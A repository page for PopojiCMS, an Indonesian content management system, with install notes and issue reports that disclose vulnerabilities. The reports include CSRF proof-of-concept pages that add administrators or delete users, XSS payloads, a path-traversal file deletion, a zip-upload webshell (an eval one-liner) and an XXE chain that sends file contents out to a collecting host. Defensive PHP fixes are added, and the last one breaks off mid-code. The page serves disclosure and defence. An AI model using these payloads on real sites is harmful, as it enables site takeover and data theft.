
popojicms's Introduction

PopojiCMS

Free Content Management System - Indonesia. Contact: [email protected]

How to install PopojiCMS

  1. Extract popojicms.v.x.x.x.zip into your web directory.
  2. Create a new database that will hold the installed tables.
  3. In your browser, open the web address where popojicms.v.x.x.x.zip was extracted.
  4. Follow the installation instructions carefully.
  5. If the installation succeeds, delete or rename install.php and delete this README file from your web directory.
  6. PopojiCMS is ready to use.

Notes (please read)

Localhost

If installed on localhost, make sure the rewrite_module setting is on.

Error 500

If a 500 Internal Server Error occurs (once the site is hosted), it is probably because the .htaccess file does not yet contain the line RewriteBase /. The solution is to add the line RewriteBase / before RewriteEngine on.

Redirect problems

If you get the error "The page isn't redirecting properly" or "This webpage has a redirect loop", try the following steps:

  • Check again whether rewrite_module is on.
  • Check that the .htaccess file was copied correctly to your local server or hosting.
  • Then clear your browser cache.

Possible file errors

If other errors occur, they may be caused by an incomplete file extraction; please replace the affected files.

Permissions

On hosting, change the user permissions of the po-upload folder to 775 (po-content --> uploads).

Logging in to the PopojiCMS backend

  • Go to http://nama.web.anda/po-admin
  • Enter the login details as follows: Username: as entered during the installation process. Password: as entered during the installation process.

Thanks To

  1. God Almighty
  2. The people behind PopojiCMS
  3. Aries, as the creator of the backend template v.1.0.1 - v.1.1.1
  4. Aquincum, as the creator of the backend template v.1.1.2 - v.1.2.2
  5. ProUI, as the creator of the backend template v.1.2.3 - v.1.3.0
  6. Enews, Magazine, Andia, Brownie, Wiretree, Neon, Pressroom and Canvas, as the creators of the frontend templates
  7. StructureCore Installation, as the reference for the installation module
  8. Easy Menu Manager, as the creator of the menu manager component
  9. FluentPDO, Bramus, Plates and all the PHP libraries used in PopojiCMS
  10. jQuery, Bootstrap and all the jQuery plugins used in PopojiCMS


popojicms's Issues

I found a file upload issue that exists in v2.0.1 of PopojiCMS

One: use the file upload issue vulnerability to getshell
Vulnerability details:
Use the known CSRF to obtain background permissions, and then we can upload the maliciously constructed zip file on the Add Theme page.
Vulnerability url: http://127.0.0.1:1000/po-admin/admin.php?mod=theme&act=addnew
Steps:
1. We need to get background permission.
2. Prepare zip files which include a malicious php file.
3. We can upload the file in "Home Dashboard / Add Theme".
4. We can find the php file at http://127.0.0.1:1000/po-content/themes/folder_name/file_name

Stored XSS on Post feature

Hi, @abdilahrf and I found a stored XSS vulnerability on the Post feature.
By intercepting the request, we are able to edit the request body to insert an XSS payload.

And it is executed just fine.

Storage XSS in Tambah Pengguna

version: 1.2
poc: '"><script>alert(document.cookie)</script>@test.com
The mailbox field is written with XSS malicious code when a new user is added.
Click Edit to view user information in pengguna after adding users
XSS triggered successfully

User Level Category

I'd like to ask Pak Dwi: there is already an edit option for user levels based on category and so on. What I want to ask is, can user levels be differentiated by post category?
Example:
Category: INDONESIAKU and MOTIVASI
User: admin1 and admin2

User admin1 can only update/post in the INDONESIAKU category, and vice versa. Thank you

I found a CSRF vulnerability to add administrator

One: use CSRF vulnerability to add administrator
Vulnerability details:
When the administrator logs in, opening the webpage will automatically add an administrator.
Vulnerability url: http://127.0.0.1/popojicms/po-admin/admin.php?mod=user&act=addnew
Vulnerability POC:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>OWASP CRSFTester Demonstration</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "12","8","12" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 3;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<H2>OWASP CRSFTester Demonstration</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/popojicms/po-admin/route.php?mod=user&act=addnew">
<input type="hidden" name="username" value="fatmo006"/>
<input type="hidden" name="nama_lengkap" value="fatmo006"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="repeatpass" value="123456"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="no_telp" value="000-0000-9001"/>
<input type="hidden" name="level" value="1"/>
</form>
<form method="GET" name="form1" action="http://127.0.0.1:80/popojicms/po-admin/admin.php?mod=user">
<input type="hidden" name="name" value="value"/> 
</form>

</body>
</html>

I found a CSRF vulnerability that can add a super administrator account directly

    POST /PopojiCMS/po-admin/route.php?mod=user&act=addnew HTTP/1.1
    Host: www.test.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 128
    Cookie: iCMS_USER_AUTH=dc043aa07gOqcLfWTuJoLSCrKIkbJNa8SPGk1VUKhacikJl4JxbrK2aBNBbk0bbmKnQwweqtz7vvJ93P2lLGBzezHER9aEK_HMs0_39QpgM5hSdhCCNxDv8Lwtx1RRqZEVpWUZBwAjJe9476soMuCC6-gJ1e_mfMMhYSA8ioWG1OUFUvUW07tVg5F0RUP2oamPz91F-t85bDNOEnubfHpxzFMND3EABDYJN0o1HfVweojEDYaxs-l6VEiuc0fFUlm-MIZXnd5xe1h6std5cCRwRCS_H71q-oTNO3NbuyojT9HVlCafwxmz7BTlmfIRHeADx7DImb_UyY_daATbgMffPsEHs4KApMstm9pbT4D53E8YbyCAnCDog4MQ7tV3snwpSRufPJCdeY3fkJUFyDhfbqTiJXEAxAcOWCoxGwLXWPI-Ns9Tyjh4WJChqpy0_gwa3JSszGZOQZaAf86KqeDKdct-YSE2UN6qwRVvUeOijMZrdzPxaqt_1OzlhDeBPlM4UW4xQMh7VQ3q5TcfpIHclZWiAspuU8Ynnj3XEwAo8; iCMS_userid=b8423c8bm9SnzUz782Y6XmtRdU1dTR3CL9iqL-Iv83vI7htnIg; iCMS_nickname=c3bc646dcSTyka3txmYpDcMW2sUPNhaunl7kIzv0Nf_89GTeIZNk; SESScc7018fb7c828d13ca316e4ca4f83f45=reN7QmxRtg9oImYLl_d5_ZsuNHhcU1_umYek0QW3BUc; PHPSESSID=5o4r0qmiao4kna434n7kdbnn14
    referer: http://www.test.com/fiyocms/
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    
    username=p0desta1&nama_lengkap=p0desta1&password=p0desta&repeatpass=p0desta&email=p0desta%40p0desta.com&no_telp=12121212&level=1

The reason for this problem is the same as above: there is no CSRF protection, so you can get a super administrator account by sending a link to the administrator, after constructing a PoC:

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <form id="p0desta" action="http://www.test.com/PopojiCMS/po-admin/route.php?mod=user&act=addnew" method="POST">
          <input type="hidden" name="username" value="p0desta1" />
          <input type="hidden" name="nama&#95;lengkap" value="p0desta1" />
          <input type="hidden" name="password" value="p0desta" />
          <input type="hidden" name="repeatpass" value="p0desta" />
          <input type="hidden" name="email" value="p0desta&#64;p0desta&#46;com" />
          <input type="hidden" name="no&#95;telp" value="12121212" />
          <input type="hidden" name="level" value="1" />
        </form>
    	<script>document.getElementById('p0desta').submit();</script>
      </body>
    </html>
    

Submit Button Not Responding

Hi, when I click the submit button on New Post and on Page it doesn't work, there is no response at all.
Please help

I found a CSRF vulnerability to delete user

One: use CSRF vulnerability to delete user
Vulnerability details:
When the administrator logs in, opening the webpage will automatically delete the specified user.
Vulnerability url: http://127.0.0.1/popojicms/po-admin/admin.php?mod=user
Vulnerability POC:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>OWASP CRSFTester Demonstration</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "7","7","10" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 3;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<H2>OWASP CRSFTester Demonstration</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/popojicms/po-admin/route.php?mod=user&act=multidelete">
<input type="hidden" name="totaldata" value="1"/>
<input type="hidden" name="table-user_length" value="10"/>
<input type="hidden" name="item[0][deldata]" value="5"/>
</form>
<form method="GET" name="form1" action="http://127.0.0.1:80/popojicms/po-admin/admin.php?mod=user">
<input type="hidden" name="name" value="value"/> 
</form>

</body>
</html>

I found a background arbitrary file deletion vulnerability

    POST /PopojiCMS/po-admin/route.php?mod=library&act=delete HTTP/1.1
    Host: www.test.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 20
    Referer: http://www.test.com/fiyocms/
    Cookie: iCMS_USER_AUTH=dc043aa07gOqcLfWTuJoLSCrKIkbJNa8SPGk1VUKhacikJl4JxbrK2aBNBbk0bbmKnQwweqtz7vvJ93P2lLGBzezHER9aEK_HMs0_39QpgM5hSdhCCNxDv8Lwtx1RRqZEVpWUZBwAjJe9476soMuCC6-gJ1e_mfMMhYSA8ioWG1OUFUvUW07tVg5F0RUP2oamPz91F-t85bDNOEnubfHpxzFMND3EABDYJN0o1HfVweojEDYaxs-l6VEiuc0fFUlm-MIZXnd5xe1h6std5cCRwRCS_H71q-oTNO3NbuyojT9HVlCafwxmz7BTlmfIRHeADx7DImb_UyY_daATbgMffPsEHs4KApMstm9pbT4D53E8YbyCAnCDog4MQ7tV3snwpSRufPJCdeY3fkJUFyDhfbqTiJXEAxAcOWCoxGwLXWPI-Ns9Tyjh4WJChqpy0_gwa3JSszGZOQZaAf86KqeDKdct-YSE2UN6qwRVvUeOijMZrdzPxaqt_1OzlhDeBPlM4UW4xQMh7VQ3q5TcfpIHclZWiAspuU8Ynnj3XEwAo8; iCMS_userid=b8423c8bm9SnzUz782Y6XmtRdU1dTR3CL9iqL-Iv83vI7htnIg; iCMS_nickname=c3bc646dcSTyka3txmYpDcMW2sUPNhaunl7kIzv0Nf_89GTeIZNk; SESScc7018fb7c828d13ca316e4ca4f83f45=reN7QmxRtg9oImYLl_d5_ZsuNHhcU1_umYek0QW3BUc; PHPSESSID=5o4r0qmiao4kna434n7kdbnn14
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    
    id=../../p0desta.txt

Vulnerability analysis:

Look at line 167 of admin_library.php:

    	public function delete()
    	{
    		if (!$this->auth($_SESSION['leveluser'], 'library', 'delete')) {
    			echo $this->pohtml->error();
    			exit;
    		}
    		if (!empty($_POST)) {
    			if ($this->postring->isImage('../'.DIR_CON.'/uploads/'.$_POST['id'])) {
    				if (file_exists('../'.DIR_CON.'/thumbs/'.$_POST['id'])) {
    					unlink('../'.DIR_CON.'/thumbs/'.$_POST['id']);
    				}
    				if (file_exists('../'.DIR_CON.'/uploads/medium/medium_'.$_POST['id'])) {
    					unlink('../'.DIR_CON.'/uploads/medium/medium_'.$_POST['id']);
    				}
    				if (file_exists('../'.DIR_CON.'/uploads/'.$_POST['id'])) {
    					unlink('../'.DIR_CON.'/uploads/'.$_POST['id']);
    				}
    			} else {
    				if (file_exists('../'.DIR_CON.'/uploads/'.$_POST['id'])) {
    					unlink('../'.DIR_CON.'/uploads/'.$_POST['id']);
    				}
    			}
    			$this->poflash->success($GLOBALS['_']['library_message_2'], 'admin.php?mod=library');
    		}
    	}

You can see that it wants to delete the image, and if it is not an image, it is deleted anyway. So we can delete any file by traversing directories.
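
For the defensive side of this report: an added example, not PopojiCMS code, of a delete handler that confines $_POST['id'] to the uploads directory before calling unlink(). $contentDir stands in for '../'.DIR_CON from the excerpt above, the helper names are mine, and the scratch files are constructed for the demo.

```php
<?php
// Added example, not PopojiCMS code. Confines a user-supplied file name to the
// uploads directory before anything is unlinked. $contentDir plays the role of
// '../'.DIR_CON in the handler above; helper names are assumptions.

function resolveUploadPath(string $uploadsDir, string $id): ?string
{
    // A library file is identified by a bare file name: no separators, no NUL
    // byte, no "." or "..". basename() strips any directory part, so a
    // mismatch means the caller tried to supply one.
    if ($id === '' || strpbrk($id, "/\\\0") !== false || $id !== basename($id)
        || $id === '.' || $id === '..') {
        return null;
    }
    $base = realpath($uploadsDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks and "..", so the final check is on the real
    // location: it must be a regular file whose parent is exactly $base.
    $target = realpath($base . DIRECTORY_SEPARATOR . $id);
    if ($target === false || dirname($target) !== $base || !is_file($target)) {
        return null;
    }
    return $target;
}

function deleteLibraryFile(string $contentDir, string $id): bool
{
    $uploads = $contentDir . '/uploads';
    $path = resolveUploadPath($uploads, $id);
    if ($path === null) {
        // Worth logging: a rejected id is either a bug or a traversal attempt.
        error_log('refused library delete for id=' . var_export($id, true));
        return false;
    }
    // The thumbnail and medium-size copies are derived from the same validated
    // name, so they cannot point anywhere the original could not.
    $copies = [
        $contentDir . '/thumbs/' . $id,
        $uploads . '/medium/medium_' . $id,
        $path,
    ];
    foreach ($copies as $candidate) {
        if (is_file($candidate)) {
            unlink($candidate);
        }
    }
    return true;
}

// Constructed demonstration in a scratch directory: one upload plus one file
// that sits outside the uploads folder and must survive.
$scratch = sys_get_temp_dir() . '/po-demo-' . bin2hex(random_bytes(4));
mkdir($scratch . '/uploads', 0700, true);
file_put_contents($scratch . '/uploads/photo.jpg', 'jpeg bytes');
file_put_contents($scratch . '/outside.txt', 'must survive');

$attempts = ['../outside.txt', '..\\outside.txt', 'photo.jpg', 'missing.jpg'];
foreach ($attempts as $id) {
    $result = deleteLibraryFile($scratch, $id) ? 'deleted' : 'refused';
    printf("%-16s %s\n", $id, $result);
}
printf("outside.txt still exists: %s\n",
    var_export(file_exists($scratch . '/outside.txt'), true));
```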

Oracle Database

Dear all, how can it be run using an Oracle database?

A file upload vulnerability exists in the background and can getshell

The background can upload a compressed package; it is decompressed without filtering, so we can getshell. Put a webshell in the archive and upload it.
Then we can find the appropriate directory to access the getshell.
Code position

po-content\component\theme\admin_theme.php lines 114-128

    if (!empty($_POST)) {
        if (!empty($_FILES['fupload']['tmp_name'])) {
            $exp = explode('.', $_FILES['fupload']['name']);
            $themeName = $this->postring->seo_title($exp[0]).'-'.rand(000000,999999).'-popoji.'.$exp[1];
            if (in_array($exp[1], array('zip'))) {
                move_uploaded_file($_FILES['fupload']['tmp_name'], '../'.DIR_CON.'/uploads/'.$themeName);
                if (file_exists('../'.DIR_CON.'/themes/'.$this->postring->valid($_POST['folder'], 'xss'))) {
                    unlink('../'.DIR_CON.'/uploads/'.$themeName);
                    $this->poflash->error($GLOBALS['_']['theme_message_4'], 'admin.php?mod=theme');
                } else {
                    $archive = new PoPclZip('../'.DIR_CON.'/uploads/'.$themeName);
                    if ($archive->extract(PCLZIP_OPT_PATH, '../'.DIR_CON.'/themes/'.$this->postring->valid($_POST['folder'], 'xss')) == 0) {
                        unlink('../'.DIR_CON.'/uploads/'.$themeName);
                        $this->poflash->error($GLOBALS['_']['theme_message_4'], 'admin.php?mod=theme');

It only determines whether the upload is a ZIP archive; if so, it is unzipped directly, and the directory it is unzipped to is

    $archive->extract(PCLZIP_OPT_PATH, '../'.DIR_CON.'/themes/'.$this->postring->valid($_POST['folder'], 'xss'))

File upload POC

    POST /PopojiCMS/po-admin/route.php?mod=theme&act=addnew HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------2687329433777
    Content-Length: 594
    Origin: null
    Cookie: iCMS_USER_AUTH=dc043aa07gOqcLfWTuJoLSCrKIkbJNa8SPGk1VUKhacikJl4JxbrK2aBNBbk0bbmKnQwweqtz7vvJ93P2lLGBzezHER9aEK_HMs0_39QpgM5hSdhCCNxDv8Lwtx1RRqZEVpWUZBwAjJe9476soMuCC6-gJ1e_mfMMhYSA8ioWG1OUFUvUW07tVg5F0RUP2oamPz91F-t85bDNOEnubfHpxzFMND3EABDYJN0o1HfVweojEDYaxs-l6VEiuc0fFUlm-MIZXnd5xe1h6std5cCRwRCS_H71q-oTNO3NbuyojT9HVlCafwxmz7BTlmfIRHeADx7DImb_UyY_daATbgMffPsEHs4KApMstm9pbT4D53E8YbyCAnCDog4MQ7tV3snwpSRufPJCdeY3fkJUFyDhfbqTiJXEAxAcOWCoxGwLXWPI-Ns9Tyjh4WJChqpy0_gwa3JSszGZOQZaAf86KqeDKdct-YSE2UN6qwRVvUeOijMZrdzPxaqt_1OzlhDeBPlM4UW4xQMh7VQ3q5TcfpIHclZWiAspuU8Ynnj3XEwAo8; iCMS_userid=b8423c8bm9SnzUz782Y6XmtRdU1dTR3CL9iqL-Iv83vI7htnIg; iCMS_nickname=c3bc646dcSTyka3txmYpDcMW2sUPNhaunl7kIzv0Nf_89GTeIZNk; SESScc7018fb7c828d13ca316e4ca4f83f45=reN7QmxRtg9oImYLl_d5_ZsuNHhcU1_umYek0QW3BUc; PHPSESSID=5o4r0qmiao4kna434n7kdbnn14
    referer: http://127.0.0.1/
    Connection: keep-alive
    Cache-Control: max-age=0
    
    -----------------------------2687329433777
    Content-Disposition: form-data; name="theme"
    
    p0desta
    -----------------------------2687329433777
    Content-Disposition: form-data; name="type"
    
    theme
    -----------------------------2687329433777
    Content-Disposition: form-data; name="fupload"; filename="shell.zip"
    Content-Type: application/x-zip-compressed
    
   <?php @eval($_POST['cmd'];) ?>

Social media and share

I have tried the settings at po-admin/admin.php?mod=setting#config, entering the name, username and FB id, but it still doesn't work. Please advise.

I found a CSRF vulnerability that can getshell

    POST /PopojiCMS/po-admin/route.php?mod=component&act=addnew HTTP/1.1
    Host: www.test.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------2687329433777
    Content-Length: 594
    Origin: null
    Cookie: iCMS_USER_AUTH=dc043aa07gOqcLfWTuJoLSCrKIkbJNa8SPGk1VUKhacikJl4JxbrK2aBNBbk0bbmKnQwweqtz7vvJ93P2lLGBzezHER9aEK_HMs0_39QpgM5hSdhCCNxDv8Lwtx1RRqZEVpWUZBwAjJe9476soMuCC6-gJ1e_mfMMhYSA8ioWG1OUFUvUW07tVg5F0RUP2oamPz91F-t85bDNOEnubfHpxzFMND3EABDYJN0o1HfVweojEDYaxs-l6VEiuc0fFUlm-MIZXnd5xe1h6std5cCRwRCS_H71q-oTNO3NbuyojT9HVlCafwxmz7BTlmfIRHeADx7DImb_UyY_daATbgMffPsEHs4KApMstm9pbT4D53E8YbyCAnCDog4MQ7tV3snwpSRufPJCdeY3fkJUFyDhfbqTiJXEAxAcOWCoxGwLXWPI-Ns9Tyjh4WJChqpy0_gwa3JSszGZOQZaAf86KqeDKdct-YSE2UN6qwRVvUeOijMZrdzPxaqt_1OzlhDeBPlM4UW4xQMh7VQ3q5TcfpIHclZWiAspuU8Ynnj3XEwAo8; iCMS_userid=b8423c8bm9SnzUz782Y6XmtRdU1dTR3CL9iqL-Iv83vI7htnIg; iCMS_nickname=c3bc646dcSTyka3txmYpDcMW2sUPNhaunl7kIzv0Nf_89GTeIZNk; SESScc7018fb7c828d13ca316e4ca4f83f45=reN7QmxRtg9oImYLl_d5_ZsuNHhcU1_umYek0QW3BUc; PHPSESSID=5o4r0qmiao4kna434n7kdbnn14
    referer: http://www.test.com/fiyocms/
    Connection: keep-alive
    Cache-Control: max-age=0
    
    -----------------------------2687329433777
    Content-Disposition: form-data; name="component"
    
    p0desta
    -----------------------------2687329433777
    Content-Disposition: form-data; name="type"
    
    component
    -----------------------------2687329433777
    Content-Disposition: form-data; name="fupload"; filename="shell.zip"
    Content-Type: application/x-zip-compressed
    
    PK���

The background upload page does not have CSRF protection, so we can construct the PoC:

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <script>
          (function submitRequest()
          {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http://www.test.com/PopojiCMS/po-admin/route.php?mod=component&act=addnew", true);
            xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
            xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
            xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2687329433777");
            xhr.withCredentials = true;
            var body = "-----------------------------2687329433777\r\n" + 
              "Content-Disposition: form-data; name=\"component\"\r\n" + 
              "\r\n" + 
              "p0desta\r\n" + 
              "-----------------------------2687329433777\r\n" + 
              "Content-Disposition: form-data; name=\"type\"\r\n" + 
              "\r\n" + 
              "component\r\n" + 
              "-----------------------------2687329433777\r\n" + 
              "Content-Disposition: form-data; name=\"fupload\"; filename=\"shell.zip\"\r\n" + 
              "Content-Type: application/x-zip-compressed\r\n" + 
              "\r\n" + 
              "PK\x03\x04\x14\x00\x00\x08\x08\x00S\x8dSM\xef\x83M\xc6\x1b\x00\x00\x00\x19\x00\x00\x00\t\x00\x00\x00shell.php\xb3\xb1/\xc8(PH-K\xcc\xd1P\x89\x0f\xf0\x0f\x0e\x896\x8c\xd5\xb4V\xb0\xb7\x03\x00PK\x01\x02?\x00\x14\x00\x00\x08\x08\x00S\x8dSM\xef\x83M\xc6\x1b\x00\x00\x00\x19\x00\x00\x00\t\x00$\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00shell.php\n" + 
              "\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00nT\xbd\x11\x90g\xd4\x01\x84n\x12\x04\x90g\xd4\x01\x84n\x12\x04\x90g\xd4\x01PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00[\x00\x00\x00B\x00\x00\x00\x00\x00\r\n" + 
              "-----------------------------2687329433777--\r\n";
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++)
              aBody[i] = body.charCodeAt(i); 
            xhr.send(new Blob([aBody]));
          })();
        </script>
      </body>
    </html>
    

Then send the link to the admin, and we can getshell.

I found an XXE vulnerability which causes arbitrary file read.

We can find the code causing the vulnerability on line 972 in po-content\component\post\admin_post.php:

    $importfile = simplexml_load_file('../'.DIR_CON.'/uploads/'.$xmlfile);

This CMS uses the function simplexml_load_file() without the function libxml_disable_entity_loader(true);, so we can construct a special XML file to read any file on the target.
The specific attack flow is as follows:
01 We construct an XML file as follows:

<?xml version="1.0"?>
<!DOCTYPE message [
    <!ENTITY % remote SYSTEM "http://127.0.0.1/vulTest/01-dtd.dtd">  
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///E:/flag.txt">
    %remote;
    %send;
]>

02 We construct a dtd file as follows:

<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://127.0.0.1/vulTest/dtdTest.php?con=%file;'>">
%start;

We changed the name of this dtd file to: 01-dtd.dtd.

03 We construct a php file as follows:

<?php
    $con = $_GET['con'];
    $con = base64_decode($con);
    $myfile = fopen("fileVal.txt", "w") or die("Unable to open file!");
    fwrite($myfile, $con);
    fclose($myfile);

We changed the name of this dtd file to: dtdTest.php.

04 We prepare a web server and put the dtd file and php file in www\vulTest\ .

05 We visit http://127.0.0.1/popojicms/po-admin/admin.php?mod=home , click Post->Semua Post->Import dari WP dan PopojiCMS Lama.

06 There is an upload page; we can upload an XML file to the target.

07 Upload our XML file.

08 We can find that the file E:/flag.txt on the target machine was downloaded to \WWW\vulTest\fileVal.txt.
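
On the defensive side of this report, here is an added example (not PopojiCMS code) of how the import step could load the uploaded XML without resolving external entities. The function name and the demo file names are assumptions, and the two sample documents are constructed.

```php
<?php
// Added example, not PopojiCMS code: a replacement for the
// simplexml_load_file() call at the import step the report describes. It reads
// the uploaded file into memory and parses it with external entities and
// network access disabled.

function loadImportXml(string $path): ?SimpleXMLElement
{
    if (PHP_VERSION_ID < 80000) {
        // Before PHP 8.0 external entity loading is on by default; make the
        // safe setting explicit there (the call is deprecated on 8.x).
        libxml_disable_entity_loader(true);
    }
    $data = file_get_contents($path);
    if ($data === false) {
        return null;
    }
    // A WordPress or PopojiCMS export never needs a DOCTYPE, and a DOCTYPE is
    // the only place entity declarations can appear, so refuse it outright.
    if (preg_match('/<!DOCTYPE/i', $data)) {
        return null;
    }
    $previous = libxml_use_internal_errors(true);
    // LIBXML_NONET forbids fetching remote DTDs; LIBXML_NOENT is deliberately
    // absent so entities are never substituted even if a DOCTYPE slipped past.
    $xml = simplexml_load_string($data, 'SimpleXMLElement', LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    return $xml === false ? null : $xml;
}

// Constructed demo files: a harmless export and one with the shape of the
// parameter-entity document shown in the report (pointing at a dead host).
$benignXml = <<<'XML'
<?xml version="1.0"?>
<rss><channel><item><title>Hello</title></item></channel></rss>
XML;
$hostileXml = <<<'XML'
<?xml version="1.0"?>
<!DOCTYPE message [
  <!ENTITY % remote SYSTEM "http://example.invalid/never-fetched.dtd">
  %remote;
]>
<message/>
XML;

$dir = sys_get_temp_dir();
$files = [
    'benign'  => $dir . '/po-import-benign.xml',
    'hostile' => $dir . '/po-import-hostile.xml',
];
file_put_contents($files['benign'], $benignXml);
file_put_contents($files['hostile'], $hostileXml);

foreach ($files as $label => $file) {
    $doc = loadImportXml($file);
    echo $label, ': ', $doc === null ? 'rejected' : 'parsed, root <' . $doc->getName() . '>', "\n";
    unlink($file);
}
```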

Host path leak in upload.php

version:1.2
poc: delete name="file";
Normal upload file
Deleting "name="file";" will cause host physical path disclosure

The PopojiCMS 2.0.1 has xss in http://127.0.0.1/PopojiCMS-master/po-admin/admin.php?mod=menumanager

1. Login
2. Open http://127.0.0.1/PopojiCMS-master/po-admin/admin.php?mod=menumanager
3. Edit a menu
4. Open it and input the exp "><script>alert("xss")</script>

poc:
POST /PopojiCMS-master/po-admin/route.php?mod=menumanager&act=savemenu HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/PopojiCMS-master/po-admin/admin.php?mod=menumanager
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 130
Cookie: PHPSESSID=mopv5n9iv2lqb9u2nkb85ilro6
Connection: keep-alive

title=dashboard%22%3E%3Cscript%3Ealert(123)%3C%2Fscript%3E&url=admin.php%3Fmod%3Dhome&class=fa-home&active=Y&target=none&menu_id=1

FIX: Filter the id parameter

Demo.popojicms.org

Hello,

Is there a problem with the subdomain demo.popojicms.org, or is it simply no longer registered?


Thanks :)

I found a CSRF vulnerability

    POST /PopojiCMS/po-admin/route.php?mod=user&act=addnew HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/PopojiCMS/po-admin/admin.php?mod=user&act=addnew
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 127
    Connection: close
    Cookie: _ga=GA1.1.1523573753.1550292454; PHPSESSID=ebgi7l1qb4hi7jaun2rf98qej7
    Upgrade-Insecure-Requests: 1
    
    username=admin&nama_lengkap=admin123&password=admin123&repeatpass=admin123&email=eugene%40addbug.cn&no_telp=12342123412&level=1
    
    username=zjh&nama_lengkap=zjh666&password=admimn123&repeatpass=admin123&email=zjh%40baidu.com&no_telp=12345678910&level=1

Write a POST script

    <script type="text/javascript">
    function post(url, fields) {
        var p = document.createElement("form");
        p.action = url;
        p.method = "POST";
        p.target = "_self";
        p.innerHTML = fields;
        document.body.appendChild(p);
        p.submit();
    }
    function attack() {
        var fields;
        fields += "";
        fields += "";
        fields += "";
        fields += "";
        var url = "http://127.0.0.1 /PopojiCMS/po-admin/route.php?mod=user&act=addnew";
        post(url, fields);
    }
    window.onload = function() { attack(); }
    </script>

Sent to the site owner, who created an administrator account by opening the link.

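
Every CSRF report on this page (add user, delete user, component upload, and this one) comes down to route.php acting on any POST that carries the admin's session cookie. As an added example, not PopojiCMS code, this is a synchroniser-token check such a route could run before touching the database; the field name csrf_token, the helper names and the stub handler are assumptions, and the requests at the end are constructed.

```php
<?php
// Added example, not PopojiCMS code: a per-session synchroniser token for the
// backend's state-changing routes (route.php?mod=user&act=addnew and the like).
// The field name "csrf_token" and the helper names are assumptions; an array
// stands in for $_SESSION so the script runs from the command line.

function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        // 256 bits from the CSPRNG, stored server-side only; a cross-site page
        // can make the browser send the cookie but cannot read this value.
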